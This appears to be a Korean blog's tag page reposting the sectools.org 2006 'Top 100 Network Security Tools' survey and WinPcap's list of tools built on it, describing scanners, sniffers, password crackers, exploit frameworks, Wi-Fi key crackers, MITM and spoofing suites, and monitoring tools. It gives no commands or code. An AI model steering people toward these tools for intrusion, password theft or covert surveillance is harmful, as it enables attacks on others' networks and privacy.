'dsniff'에 해당되는 글 4건

  1. 2010.06.23 Top 100 Network Security Tools
  2. 2009.08.19 WinPcap-based Tools and Programs
  3. 2009.06.03 dsniff 이용한 패킷 스니핑 (Packet Sniff)
2010.06.23 18:53

Top 100 Network Security Tools

After the tremendously successful 2000 and 2003 security tools surveys, Insecure.Org is delighted to release this 2006 survey. I (Fyodor) asked users from the nmap-hackers mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also point newbies to this site whenever they write me saying “I don't know where to start”.

Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the Nmap Security Scanner were counted because the survey was taken on a Nmap mailing list. This audience also biases the list slightly toward “attack” hacking tools rather than defensive ones.

Each tool is described by one ore more attributes:

new Did not appear on the 2003 list
/ Popularity ranking rose / fell the given number since the 2003 survey
  TITLE= Generally costs money. A free limited/demo/trial version may be available.
Linux Works natively on Linux
*BSD Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants
OS X Works natively on Apple Mac OS X
Windows Works natively on Microsoft Windows
Command-line interface Features a command-line interface
GUI Interface Offers a GUI (point and click) interface
Source code Source code available for inspection.

Please send updates and suggestions (or better tool logos) to Fyodor. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our link banners. Here is the list, starting with the most popular:

GUI Interface
Nessus : Premier UNIX vulnerability assessment tool
Nessus was a popular free and open source vulnerability scanner until they closed the source code in 2005 and removed the free "registered feed" version in 2008. A limited “Home Feed” is still available, though it is only licensed for home network use. Some people avoid paying by violating the “Home Feed” license, or by avoiding feeds entirely and using just the plugins included with each release. But for most users, the cost has increased from free to $1200/year. Despite this, Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

See all vulnerability scanners

Command-line interface
GUI Interface
Source code
Wireshark : Sniffing the glue that holds the Internet together
Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences).

See all packet sniffers

Command-line interface
Source code
Snort : Everyone's favorite open source IDS
This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free Basic Analysis and Security Engine (BASE), a web interface for analyzing Snort alerts.

Open source Snort works fine for many individuals, small businesses, and departments. Parent company SourceFire offers a complimentary product line with more enterprise-level features and real-time rule updates. They offer a free (with registration) 5-day-delayed rules feed, and you can also find many great free rules at Bleeding Edge Snort.

See all intrusion detection systems

Command-line interface
Source code
Netcat : The network Swiss army knife
This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. The original Netcat was released by Hobbit in 1995, but it hasn't been maintained despite its immense popularity. It can sometimes even be hard to find nc110.tgz. The flexibility and usefulness of this tool have prompted people to write numerous other Netcat implementations - often with modern features not found in the original. One of the most interesting is Socat, which extends Netcat to support many other socket types, SSL encryption, SOCKS proxies, and more. It even made this list on its own merits. There is also Chris Gibson's Ncat, which offers even more features while remaining portable and compact. Other takes on Netcat include OpenBSD's nc, Cryptcat, Netcat6, PNetcat, SBD, and so-called GNU Netcat.

See all Netcats

Command-line interface
Source code
Metasploit Framework : Hack the Planet
Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.

See all vulnerability exploitation tools

Command-line interface
Source code
Hping2 : A network probing utility like ping on steroids
This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rulesets. It is also great for learning more about TCP/IP and experimenting with IP protocols.

See all packet crafting tools

Command-line interface
Source code
Kismet : A powerful wireless sniffer
Kismet is an console (ncurses) based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating, ...

See all wireless tools, and packet sniffers

Command-line interface
Source code
Tcpdump : The classic sniffer for network monitoring and data acquisition
Tcpdump is the IP sniffer we all used before Ethereal (Wireshark) came on the scene, and many of us continue to use it frequently. It may not have the bells and whistles (such as a pretty GUI or parsing logic for hundreds of application protocols) that Wireshark has, but it does the job well and with fewer security holes. It also requires fewer system resources. While it doesn't receive new features often, it is actively maintained to fix bugs and portability problems. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump. TCPDump is the source of the Libpcap/WinPcap packet capture library, which is used by Nmap among many other tools.

See all packet sniffers

GUI Interface
Cain and Abel : The top password recovery tool for Windows
UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also well documented.

See all password crackers, and packet sniffers

Command-line interface
Source code
John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here.

See all password crackers

Command-line interface
GUI Interface
Source code
Ettercap : In case you still thought switched LANs provide much extra security
Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

See all packet sniffers

Command-line interface
Source code
Nikto : A more comprehensive web scanner
Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). It uses Whisker/libwhisker for much of its underlying functionality. It is a great tool, but the value is limited by its infrequent updates. The newest and most critical vulnerabilities are often not detected.

See all web vulnerability scanners

Command-line interface
Source code
Ping/telnet/dig/traceroute/whois/netstat : The basics
While there are many whiz-bang high-tech tools out there to assist in security auditing, don't forget about the basics! Everyone should be very familiar with these tools as they come with most operating systems (except that Windows omits whois and uses the name tracert). They can be very handy in a pinch, although for more advanced usage you may be better off with Hping2 and Netcat.

Command-line interface
Source code
OpenSSH / PuTTY / SSH : A secure way to access remote computers
SSH (Secure Shell) is the now ubiquitous program for logging into or executing commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network, replacing the hideously insecure telnet/rlogin/rsh alternatives. Most UNIX users run the open source OpenSSH server and client. Windows users often prefer the free PuTTY client, which is also available for many mobile devices. Other Windows users prefer the nice terminal-based port of OpenSSH that comes with Cygwin. Dozens of other free and proprietary clients exist. You can explore them here or here.

Command-line interface
GUI Interface
Source code
THC Hydra : A Fast network authentication cracker which supports many different services
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap this release is from the fine folks at THC.

See all password crackers

Command-line interface
GUI Interface
Source code
Paros proxy : A web application vulnerability assessment proxy
A Java based web proxy for assessing web application vulnerability. It supports editing/viewing HTTP/HTTPS messages on-the-fly to change items such as cookies and form fields. It includes a web traffic recorder, web spider, hash calculator, and a scanner for testing common web application attacks such as SQL injection and cross-site scripting.

See all web vulnerability scanners

Command-line interface
Source code
Dsniff : A suite of powerful network auditing and penetration-testing tools
This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. A separately maintained partial Windows port is available here. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs.

See all packet sniffers

GUI Interface
NetStumbler : Free Windows 802.11 Sniffer
Netstumbler is the best known Windows tool for finding open wireless access points ("wardriving"). They also distribute a WinCE version for PDAs and such named Ministumbler. The tool is currently free but Windows-only and no source code is provided. It uses a more active approach to finding WAPs than passive sniffers such as Kismet or KisMAC.

See all wireless tools, and packet sniffers

Command-line interface
Source code
THC Amap : An application fingerprinting scanner
Amap is a great tool for determining what application is listening on a given port. Their database isn't as large as what Nmap uses for its version detection feature, but it is definitely worth trying for a 2nd opinion or if Nmap fails to detect a service. Amap even knows how to parse Nmap output files. This is yet another valuable tool from the great guys at THC.

See all application-specific scanners

GUI Interface
GFI LANguard : A commercial network security scanner for Windows
GFI LANguard scans IP networks to detect what machines are running. Then it tries to discern the host OS and what applications are running. It also tries to collect Windows machine's service pack level, missing security patches, wireless access points, USB devices, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are saved to an HTML report, which can be customized/queried. It also includes a patch manager which detects and installs missing patches. A free trial version is available, though it only works for up to 30 days.

See all vulnerability scanners

Command-line interface
Source code
Aircrack : The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

See all wireless tools, and password crackers

GUI Interface
Superscan : A Windows-only port scanner, pinger, and resolver
SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois.

See all port scanners

Command-line interface
Source code
Netfilter : The current Linux kernel packet filter/firewall
Netfilter is a powerful packet filter implemented in the standard Linux kernel. The userspace iptables tool is used for configuration. It now supports packet filtering (stateless or stateful), all kinds of network address and port translation (NAT/NAPT), and multiple API layers for 3rd party extensions. It includes many different modules for handling unruly protocols such as FTP. For other UNIX platforms, see Openbsd PF (OpenBSD specific), or IP Filter. Many personal firewalls are available for Windows (Tiny,Zone Alarm, Norton, Kerio, ...), though none made this list. Microsoft included a very basic firewall in Windows XP SP2, and will nag you incessantly until you install it.

See all firewalls

Command-line interface
GUI Interface
Sysinternals : An extensive collection of powerful windows utilities
Sysinternals provides many small windows utilities that are quite useful for low-level windows hacking. Some are free of cost and/or include source code, while others are proprietary. Survey respondents were most enamored with:
  • ProcessExplorer for keeping an eye on the files and directories open by any process (like LSoF on UNIX).
  • PsTools for managing (executing, suspending, killing, detailing) local and remote processes.
  • Autoruns for discovering what executables are set to run during system boot up or login.
  • RootkitRevealer for detecting registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit.
  • TCPView, for viewing TCP and UDP traffic endpoints used by each process (like Netstat on UNIX).
Update: Microsoft acquired Sysinternals in July 2006, promising that “Customers will be able to continue building on Sysinternals' advanced utilities, technical information and source code”. Less than four months later, Microsoft removed most of that source code. Future product direction is uncertain.

See all rootkit detectors

GUI Interface
Retina : Commercial vulnerability assessment scanner by eEye
Like Nessus, Retina's function is to scan all the hosts on a network and report on any vulnerabilities found. It was written by eEye, who are well known for their security research.

See all vulnerability scanners

출처 : http://sectools.org/

Trackback 3 Comment 0
2009.08.19 11:55

WinPcap-based Tools and Programs

This is a partial list of WinPcap-based tools. We add a program when we come across it on the network, or when the developer tells us about its availability.
Please contact us at winpcap-team [at] winpcap.org to add new tools to this list.

  • Aerosol
    Wardriving utility for Windows.
  • AirSnare
    AirSnare is an intrusion detection system to help you monitor your wireless network.
  • Analyzer
    Analyzer is a fully configurable Network Analyzer for Win32. It includes several functionalities that are needed by network management operator. Analyzer is based on WinPcap and it is able to capture packets on most Win32 platforms (and link-layer technologies). Analyzer 3.0 comes out with some event logging, LAN monitoring and traffic monitoring capabilities. However, Analyzer 3.0 most valuable point is the ability to parse network packets according to the protocol description contained into some external files, which can be modified at run-time by the user.
  • Archaeopteryx
    Archaeopteryx is a Passive mode OS Identification Tool. It is based off Siphon v.666 by SubTerrain. It has a GUI and a highly configurable OS signature file.
  • ARP0c
    ARP0c is an ARP redirector and bridging engine. ARP requests from various sources in a switched environment get false ARP response which point to the host running ARP0c. Packets from these hosts are bridged to the real destination address to allow normal network operation and keep TCP connections alive.
  • Asn1Browser
    The Asn1Browser analyzer decodes ASN1 binary data and provides an advanced display for the user.
  • assniffer
    assniffer can monitor a network, and for every HTTP transfer it sees, save a copy of the transferred data.
  • BillSniff
    BillSniff is a free (freeware) sniffer under MS Windows.
  • Bit-Twist
    Bit-Twist is a simple yet powerful WinPcap-based Ethernet packet generator. It is designed to compliment WinDump, which by itself has done a great job in capturing network traffic. With Bit-Twist, you can now regenerate the captured traffic onto a live network! Packets are generated from windump trace file (.pcap file). Bit-Twist also comes with a comprehensive trace file editor to allow you to change the contents of a trace file.
  • Blackart
    Blackart for Windows is a sniffer for personal users. It captures all or specified packets at Data Link Layer. It can also parse and explain the headers of Ethernet, IP, TCP, UDP and ICMP.
  • Bochs
    Bochs is a highly portable open source IA-32 (x86) PC emulator written in C++, that runs on most popular platforms. It includes emulation of the Intel x86 CPU, common I/O devices, and a custom BIOS.
  • Busted!
    Busted! records AOL instant message conversations, web sites visited, applications used, keystrokes and takes periodic screen shots.
  • CableMon
    Cable traffic monitoring tool.
  • Cain & Abel
    Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
  • CarnivorePE
    Carnivore is a surveillance tool for data networks. At the heart of the project is CarnivorePE, a software application that listens to all Internet traffic (email, web surfing, etc.) on a specific local network. Next, CarnivorePE serves this data stream to interfaces called "clients." These clients are designed to animate, diagnose, or interpret the network traffic in various ways.
  • cdpr - Cisco Discovery Protocol Reporter
    cdpr is used to decode a Cisco Disovery Protocol (CDP) packet, by default it will report the device ID, the IP Address (of the device), and the port number that the machine is connected to. Optionally it will decode the entire CDP packet.
  • choozmail
    parental control software.
  • CHScanner
    CHScanner allows you to scan in "style" from Windows XP SP2 and higher OS. It is IPv4 and IPv6 enabled, it has a skinnable interface and it has the ability to mimic various operating systems. Last but not least, it has many scanning methods.
  • coLinux
    Cooperative Linux is the first working free and open source method for optimally running Linux on Microsoft Windows natively. More generally, Cooperative Linux (short-named coLinux) is a port of the Linux kernel that allows it to run cooperatively alongside another operating system on a single machine. For instance, it allows one to freely run Linux on Windows 2000/XP, without using a commercial PC virtualization software such as VMware, in a way which is much more optimal than using any general purpose PC virtualization software.
    Automated, comprehensive penetration testing product for assessing specific information security threats to an organization.
  • dasniff
    daSniff is an open source customizable sniffer for win32 systems. It helps you to log your LAN traffic by specifying packet rules as filters.
  • Deep Network Analyzer (DNA)
    DNA is an open, flexible and extensible deep network analyzer (software server) and architecture for gathering and analyzing network packets, network sessions and applications protocols, passively off enterprise class networks. DNA is designed to be used for Internet Security, Intrusion detection, Network Management, Protocol and Network Analysis, Information Gathering, Network Monitoring applications.
  • dsniff
    dsniff is a collection of utilities to aid in sniffing network data.
  • EffeTech HTTP Sniffer
    EffeTech HTTP Sniffer is a HTTP protocol network sniffer, packet analyzer and file rebuilder based on Windows platform. Unlike most other sniffers, it is dedicated to capture IP packets containing HTTP protocol and to rebuild the HTTP communications and files sent through HTTP protocol.
  • Engage Packet Builder
    Scriptable libnet-based packet builder for Windows platform.
  • EtherSnoop
    EtherSnoop is a basic network sniffer, that can capture all packets going through the network. It lists the captured data in real-time, using an easy-to-understand interface with a hex and text display of the packet content. EtherSnoop also offers basic filtering by protocol type and a tree-style packet explorer. The output can be saved to file and reloaded later if needed.
  • ettercap
    Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis.
  • FAP Guard
    FAP Guard allows DirecPC and DirecWay users to monitor their Fair Access Policy ( FAP ) download level, thus preventing them from getting throttled or disconnected. You might also find this application useful if you are paying for download, or have a download limit imposed by your ISP. It provides some interesting network traffic statistics as well.
  • FanfareSVT
    The Fanfare Group delivers one-click test automation™ for communication equipment manufacturers who need to reduce their time to market and improve product quality.
  • FramePad
    FramePad is a Windows based packet sniffer and protocol analyzer, designed from the ground up with ease and functionality in mind. It allows you to examine data from a live network or from a capture file on disk.
  • FTPXerox
    FTPXerox grabs files that are transferred across the network using the FTP protocol. It implements a full end-to-end TCP re-assembly engine that watches for FTP transfers.
  • Gamer's IPX Tunnel (GIT)
    GIT is a freeware utility to link LANs together over the internet for IPX-based network gameplay. It can also be used to bridge many configurations of IPX packets and frames from once point to another.
  • GIPS IP Network Simulator
    The GIPS IP Network Simulator is a software tool that allows the user to emulate network behavior by delaying and/or dropping packets in an IP-network. Installed in a laptop it can be placed between two LAN’s, two gateways, or any two IP devices and simulate the network conditions experienced by the two end-points.
  • Hammer Call Analyzer
    The Hammer Call Analyzer enables users to visualize signaling and voice quality problems in VoIP networks. For example, the unique call list and multistage call flow display features walk engineers through the legs of a particular call. In addition, the Hammer Call Analyzer displays waveforms and the Stream Quality Signature for any call.
  • HiDownload
    HiDownload is a multi-threaded download manager that allows you to download individual files (or lists of files) from web and FTP.
  • Honeyd
    Honeyd is a small daemon that creates virtual hosts on a network that enhances network security by providing "honeypot" decoys that enable network security officers to detect, monitor, and contain unauthorized network activities without the intruder knowing they are being tracked.
  • hping
    hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn't only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
  • HTTP snoop
     A simple but functional HTTP sniffer application. It will display a few basic information about every "HTTP packet" that it sees on the NIC and decode all basics authentication header entries it finds (both for proxies and for web sites). It will also write everything in the HTTP request that is both in the same packet and before the firs null char.
  • HttpTracer
    View web traffic between browser and any Internet server. HttpTracer is a windows program that runs as a proxy server on your desktop, catching and displaying all textual commands and data sent and recieved by a web browser.
  • JPcap
    A Java wrapper for WinPcap. It allows Java code to access to the WinPcap (and libpcap on UNIX) calls.
  • IM Sniffer
    Intercepts and decodes all instant message traffic received by the computer. A high performance engine delivers real time message decryption. Conversations can be viewed immediately or saved for later analysis. Freeware.
  • iNetWatcher
    iNetWatcher© is based on Winpcap, may fully monitor the Internet activity of staff or students, record the E-mail transmitting through the Internet and Web Page; monitor the various real-time chatting messages and IM files sent; monitor the register table, hard disk, system information of the employee's computer; monitor FTP; monitor net flow of all staff.
  • ipInterceptor
    Trace TCP/UDP Packets on your workstation. View packets in a logical sequence, with requests and responses grouped into conversations (showing the resulting response times). Set filters for tracing. View headers and data in text or HEX format.
  • IpMaster/IpMasterPro
    Internet/Network Ip address & data packet monitor.
  • IP Sniffer
    Windows 2000/XP packet sniffer with replay function.
  • ItCan.Net Monitor
    ItCan.Net Monitor is a bandwidth analysis utility. Besides giving a graphical illustration of the bandwidth usage on your computer or the network it resides, you get a list of all incoming and outgoing connections.
  • KolSniffer
    Kolsniffer contains a component to write very small self-contained WinPcap applications with Delphi and the Key Object Library framework. The source code is a translation of the Tsniffer class that Umar Sears wrote earlier. The source code is freeware, with the permission of the original author. It was written by Thaddy de Koning. The zip filecontains a demo with sources, that illustrates how to use the component. The Key Object Library framework itself is available from http://bonanzas.rinet.ru
  • LaBrea@Home
    LaBrea@Home is a version of the original network administrator's tool "LaBrea" for home use. LaBrea is a way to combat both port scanners and worms such as Code Red and Nimda. The original network administrator's "LaBrea" creates phantom machines which hold scanners and worms in a sort of "tarpit", luring them in, and holding onto their communications with what they think are real machines.
  • LeetGeek ICMP Tunneler
    An ICMP tunneling program.
  • Libnet
    Libnet is a high-level API (toolkit) allowing the application programmer to construct and inject network packets. It provides a portable and simplified interface for low-level network packet shaping, handling and injection.
  • Libnids
    Libnids is an implementation of an E-component of Network Intrusion Detection System. It emulates the IP stack of Linux 2.0.x. Libnids offers IP defragmentation, TCP stream assembly and TCP port scan detection.
  • lwIP
    lwIP is a small independent implementation of the TCP/IP protocol suite. The focus of the lwIP TCP/IP implementation is to reduce the RAM usage while still having a full scale TCP.
  • MSN Protocol Analyzer
    MSNProtocol Analyzer(MSNPAnalyzer) is a network utility that can monitor (or capture, monitor) the sessions of MSN Protocol.
    If you use this program in conbination with SwitchSniffer program, you can capture and see all the MSNP sessions including conversations and MSN commands
  • MSN Webcam Recorder
    MSN Webcam Recorder is a tool that allows you to record video streamed to and from your computer by MSN Messenger's Webcam Feature.
  • myNetMon
    myNetMon is windows based network monitor and packet analyzing (sniffer).
  • Nemesis
    Nemesis is a command-line network packet injection utility for UNIX-like and Windows systems. You might think of it as an EZ-bake packet oven or a manually controlled IP stack. With Nemesis, it is possible to generate and transmit packets from the command line or from within a shell script.
  • Net::Pcap for Win32
    A Perl interface to the libpcap library. Net::PcapUtils is available on the same site.
  • NETI@home
    NETI@home is an open-source software package that collects network performance statistics from end-systems. It has been written for and tested on the Windows, Linux, and Solaris operating systems, with testing for other operating systems to be completed soon. NETI@home is designed to run on end-user machines and will collect various statistics about Internet performance. These statistics will then be sent to a server at the Georgia Institute of Technology (Georgia Tech), where they will be collected and made publicly available.
  • NetCalibrator
    NetCalibrator offers statistical analysis of captured data in support of performance analysis. The approach being used provides ability to quantify performance issues for small as well as large (>500,000) number of packets.
  • NetPredictor
    NetPredictor offers monitoring and prediction of application performance. It enables you to build, or to interactively discover, the path between an application user and the server.
  • netwib, netwox and netwag
    Netwib provides sniff, spoof, client, server and most functions needed by network programs. Toolbox netwox helps to find and solve networks' problems. Netwag is a graphical network toolbox. Netwox and netwag contain over 150 tools.
  • NetWitness
    NetWitness gives an organization the ability to quickly understand and respond to network activity of interest, regardless of the device provisioning the data or the application producing the packets.
  • Network packet generator
    Network Packet Generator (npg) is a free GNU GPL Windows packet injector (generator) that utilizes WinPcap to send specific packets out a single or multiple network interfaces. These packets and other extended options can be defined on the command line, in a packet file, or combination of the two.
  • NeVO
    Determine vulnerabilities on your network through passive monitoring much like a sniffer. NeVO dynamically learns about your servers, services and vulnerabilities by performing signature and protocol analysis of the observed network sessions.
  • NeWT
    Easy-to-use windows vulnerability scanner based on Nessus technology. NeWT installs on any Windows 2000 or Windows XP computer and can quickly scan several thousand hosts for vulnerabilities and produce detailed vulnerability reports.
  • ngrep
    Ngrep strives to provide most of GNU grep's common features, applying them to the network layer
  • NmapNT
    Nmap is a utility for network exploration or security auditing. It supports ping scanning (determine which hosts are up), many port scanning techniques (determine what services the hosts are offering), and TCP/IP fingerprinting (remote host operating system identification). Nmap also offers flexible target and port specification, decoy scanning, determination of TCP sequence predictability characteristics, sunRPC scanning, reverse-identd scanning, and more.
  • ntop
    ntop is a tool that shows the network usage, similar to what the popular top Unix command does.
  • Nuzzler IDS
    The Securepoint Intrusion Detection System (Nuzzler) allows to analyse the network for intrusion detection. Nuzzler can detect possible attacks, viruses, trojans and other bad traffic.
  • P2P WatchDog
    P2P WatchDog is a network sniffer which can monitor and block several Peer-to-Peer file transfer protocols, including FastTrack, Gnutella, DirectConnect, EarthStation5, eDonken, Filetopia, BitTorrent, MP2P, and Overnet.
  • Pacanal
    Packet capture and analyzer program. The source contains a C# reimplementation of the packet.dll WinPcap library.
  • Packet Excalibur
    A multi-platform graphical and scriptable network packet engine with extensible text based protocol descriptions.
  • PacketVB
    Its an ActiveX for use with Visual Basic that wraps the function exported by the WinPcap API (packet.dll).
  • PacketX
    PacketX is set of ActiveX classes that integrate winpcap packet capture functionality with Visual Basic or any other programming environment supporting Microsoft ActiveX technology.
  • Pcapy
    Pcapy is a Python extension module that interfaces with WinPcap/libpcap. Pcapy enables python scripts to capture packets on the network.
  • Packetyzer
    Packetyzer is a Windows user interface for the Ethereal packet capture and dissection library.
  • PerformaSure
    Sitraka PerformaSure allows J2EE development teams to identify sources of performance problems within an assembled application. PerformaSure coordinates the collection of performance metrics for any given transaction, following the path of execution from the initial HTTP request through load balancers, application servers, to the database and back again.
  • PI IT Monitor
    PI IT Monitor collects real-time information regarding the performance of various elements that compose an IT infrastructure. But in addition to collecting real-time values, PI IT Monitor archives such data and makes them available for use in reporting, analysis, troubleshooting, and decision making.
  • Pikachu JPEG Sniffer
    Pikachu is a networks sniffer to sniff the JPEG images flowing in the local wired/wireless Ethernet network.
  • PingPlotter
    PingPlotter is a network troubleshooting and diagnostic tool. It uses a combination of traceroute, ping, and whois to collect data quickly, and then allows you to continue to collect data over time to give you the information you really need to identify problems (both short-term and long-term trends).
  • PromiScan
    Software for remotely monitoring computers on local networks to locate network interfaces operating in a promiscuous mode.
  • PortScanner
    A TCP port scanner.
  • PSentry Internet Policy Guard & Surveillance
    PSentry sniffs network traffic at gateway point, captures and records user activites like web surf, emails, web submissions, instant messager sessions (AOL aim, MSN, ICQ, Yahoo, QQ, googletalk). It can log or block ftp, p2p file transfers. PSentry deloys different Internet policies by IP/MAC address or by user, to controls which resource or servce is permited or blocked on a LAN.
  • Pseud IP Masquerade
    Pseud IP Masquerade is a Windows application and NT/2000 Serivce, that has some basic functions of "IP Masquerade".
  • pypcap
    simplified object-oriented Python extension module for libpcap - the current tcpdump.org version, the legacy version shipping with some of the BSD operating systems, and the WinPcap port for Windows.
  • rawstuff
    rawstuff is a toolkit for totally raw (MAC level and with no TCP/IP installed) send and receive on Windows.
  • Show Traffic
    Show Traffic monitors network traffic on the chosen network interface and displays it continuously. It could be used for locating suspicious network traffic or to evaluate current utilization of the network interface.
  • SIMH
    SIMH is a highly portable, multi-system simulator.
  • Sniphere
    Sniphere is an another network wiretapping program for Windows using winpcap. Nevertheless, Sniphere is a pretty handy program with a lot of possibilities which most of free sniffers do not have.
  • SmartSniff
    SmartSniff allows you to capture TCP/IP packets that pass through your network adapter, and view the captured data as sequence of conversations between clients and servers. You can view the TCP/IP conversations in Ascii mode (for text-based protocols, like HTTP, SMTP, POP3 and FTP.) or as hex dump.
  • snoop
    Snoop is component library encapsulating WinPcap used in Delphi.
  • SnoopAnalyzer
    SnoopAnalyzer Standard is a network protocol analyzer based on network data capturing technology under Microsoft Windows platforms(95/98/Me/2000/NT/XP).
  • SnoopMSNBlock
    SnoopMSNBlock is a software to block MSN messenger service used in your company.
  • SnoopNetCoop
    SnoopNetCop Standard is a program that can detect possible packet sniffing attack on your network.
  • snort
    Snort is a lightweight network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.
  • snot
    Snot is an arbitrary packet generator, that uses snort rules files as its source of packet information. It can be used as an IDS evasion tool, by using specific decoy hosts, or just something to keep your friendly IDS monitoring staff busy.
  • SOAPscope
    SOAPscope is a Web services diagnostic system that collects and analyzes information about SOAP and WSDL by monitoring communications among SOAP endpoints.
  • ssldump
    ssldump is an SSLv3/TLS network protocol analyzer. It identifies TCP connections on the chosen network interface and attempts to interpret them as SSLv3/TLS traffic. When it identifies SSLv3/TLS traffic, it decodes the records and displays them in a textual form to stdout. If provided with the appropriate keying material, it will also decrypt the connections and display the application data traffic.
  • STINGA NGN Monitor
    Protocol analyser focusing on SS7oIP from Utel Systems. Protocols like ISUP (ITU, ANSI, UK), SCCP, TCAP, MAP, INAP, CAP/CAMEL, SMS, IS-41, Megaco/H.248, MGCP, SIP, SDP, RTP, SIP-T (ITU, ANSI, UK, DPNSS/DASS2), SCTP, M2PA, M2UA, M3UA, SUA, IAU, DUA, V5UA, TCP, UDP, IP and others are decoded in detaild by this product.
  • STINGA SIP Simulator
    Protocol simulator for SIP and SDP protocol testing.
